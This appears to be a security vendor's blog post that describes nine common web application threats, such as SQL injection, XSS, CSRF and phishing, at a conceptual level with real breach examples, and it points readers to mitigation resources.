Vulnerabilities in web applications can occur in several areas including DBA tools (e.g., phpMyAdmin), SaaS applications, and content management systems, such as WordPress. With web apps being an integral part of business processes, insecure web applications make an easy target, potentially resulting in damaged client relations, rescinded licenses, or even legal actions.

Based on our experience, the nine vectors listed below (in no particular order) are commonly used by competitors and bad actors to steal data or disrupt your web applications. We’ve put together this list of the main web application threats that will help security teams—and CxOs—to plan strategies to counter such disruptions.

Web Scraping – Probing website data is useful in several ways, including conducting market research and page ranking by search engines.

But in some cases, there’s a grey area where illicit web scrapers deploy bots to steal database information. In a competitive business category, bot operatives are able to duplicate your site content elsewhere using their name. E-commerce sites are especially vulnerable, and it’s not uncommon for scrapers to set up their site to constantly underbid your pricing.

Backdoor Attack – Being a form of malware, a backdoor circumvents login authentication to enter a system. Many organizations offer employees and partners remote access to application resources, including file servers and databases. This enables bad actors to trigger system commands in the compromised system and keep their malware updated. The attacker’s files are usually heavily cloaked, making detection problematic.

We all heard about WannaCry, Petya, Locky, among other ransomware that emerged after 2010 and took over hundreds of thousands of computers around the world. While most of the attacks required the victims to pay a ransom in exchange to recover back their data, there were others that went beyond and also provided a backdoor access to the companies’ systems.

SQL Injection (SQLI) – SQL injection relies on SQL code to manipulate database back-ends. It gains access to data your organization didn’t intend to make public, such as secure company data, user databases, or customer information. Unwanted file deletion is also a possibility in some cases. The perpetrator can even grant themselves admin rights. Here are some examples here that just happened in 2017: WordPress, Hetzner South Africa, GoDaddy, and of course, Equifax. Just counting the last one, around 145 million records were compromised.

Cross-Site Scripting (XSS) – Cross-site scripting is a common vector that inserts malicious code into a web application found to be vulnerable. Unlike other web attack types, such as SQLI, its objective isn’t your web application. Rather, it targets its users, resulting in harm to your clients and the reputation of your organization.

Reflected XSS – Reflected XSS assaults (a.k.a., non-persistent attacks) use a malicious script to reflect traffic to a visitor’s browser from your web application. Initiated via a link, a request is directed to a vulnerable website—possibly yours. Your web application is then manipulated to activate harmful scripts.

Cross-Site Request Forgery (CSRF) – Also known as XSRF, Sea Surf, or session riding, cross-site request forgery deceives the user’s browser—logged into your application—to run an unauthorized action. A CSRF can transfer funds in an authorized manner and change passwords, in addition to stealing session cookies and business data.

Man in the Middle Attack (MITM) – A man in the middle attack can occur when a bad actor positions himself between your application and an unsuspecting user. MITM can be used for eavesdropping or impersonation— nothing appears amiss in the latter. Meanwhile, account credentials, credit card numbers, and other personal information can easily be harvested by the attacker.

Phishing Attack – Phishing continues to be a favorite of social engineering practitioners. Like MITM, it can be set up to steal user data—such as credit card and login information. The perpetrator, posing as a trustworthy entity, fools their prey into opening an email, text memo, or instant message. The latter is then enticed to click a link that hides a payload. Such an action can cause malware to be surreptitiously installed. It’s also possible for ransomware to freeze the user’s PC, or for sensitive data to be passed. One of the top examples here is the Target data breach that exposed more than 40 million payment cards during the holidays. The simplicity about this attack was that it just needed to steal the credentials of a third-party contractor who was in charge of Target’s HVAC systems. In order to perform remote maintenance on air conditioners the contractor had access to Target’s contractor network, giving the perpetrator access once its account was hacked.

Remote File inclusion (RFI) – Remote file inclusion (RFI) exploits weaknesses in those web applications that dynamically call external scripts. Taking advantage of that function, an RFI attack uploads malware and takes over the system.

Each web app vulnerability is different as are its mitigation solutions. Visit our Web Application Security page to learn more about how to mitigate each type of attack we covered. Web application assaults are prevalent but you can take action to prevent them.


Would you like to write for our blog? We welcome stories from our readers, customers and partners. Please send us your ideas: blog@incapsula.com